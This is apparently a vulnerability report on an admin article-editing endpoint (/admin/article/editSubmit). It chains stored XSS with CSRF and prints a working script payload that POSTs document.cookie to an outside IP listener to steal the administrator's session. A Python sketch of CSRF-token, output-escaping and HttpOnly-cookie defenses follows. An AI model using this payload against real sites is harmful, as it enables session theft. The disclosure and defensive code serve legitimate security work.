Stored XSS in the administrator backend article editing
interface: /admin/article/editSubmit
XSS POC:
<img src=1 onerror=alert(document.cookie)>

CSRF in the administrator backend article editing
interface: /admin/article/editSubmit
CSRF POC: generated by burpsuite

Combining two vulnerabilities
Change the articleContent parameter content to XSS EXP
XSS EXP:
<script>fetch('http://192.168.239.129:8080', {method: 'POST',mode: 'no-cors',body:document.cookie});</script>
View or edit this article
Got the administrator cookie
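
Added example, not part of the original report and not the project's own code: a Python sketch of the three server-side controls that break this chain (a session-bound CSRF token on the edit endpoint, output encoding of articleContent, and an HttpOnly session cookie). The handler, the `csrf_token` and `id` form fields, the `SESSION` cookie name and the in-memory store are assumptions made for illustration.

```python
import hashlib
import hmac
import html
import secrets
from http.cookies import SimpleCookie

SERVER_KEY = secrets.token_bytes(32)  # assumption: per-deployment secret key


def issue_csrf_token(session_id):
    """Token bound to the admin session; rendered into the edit form."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def csrf_ok(session_id, submitted):
    """A cross-site form rides on the cookie but cannot supply this token."""
    if not submitted:
        return False
    expected = issue_csrf_token(session_id)
    return hmac.compare_digest(expected.encode(), submitted.encode())


def session_cookie(session_id):
    """HttpOnly hides the session from document.cookie; SameSite limits cross-site sends."""
    cookie = SimpleCookie()
    cookie["SESSION"] = session_id  # hypothetical cookie name
    cookie["SESSION"]["httponly"] = True
    cookie["SESSION"]["samesite"] = "Strict"
    cookie["SESSION"]["path"] = "/"
    return cookie["SESSION"].OutputString()


def edit_submit(session_id, form, store):
    """Hypothetical handler standing in for /admin/article/editSubmit."""
    if not csrf_ok(session_id, form.get("csrf_token")):
        return 403  # reject before any state change
    store[form["id"]] = form["articleContent"]  # stored as submitted
    return 200


def render_article(store, article_id):
    """Encode on output so stored markup is shown as text, never executed."""
    body = html.escape(store[article_id], quote=True)
    return '<div class="article">' + body + "</div>"
```

Escaping on output assumes article bodies are plain text; if the editor must accept rich HTML, an allowlist sanitizer takes the place of `html.escape`.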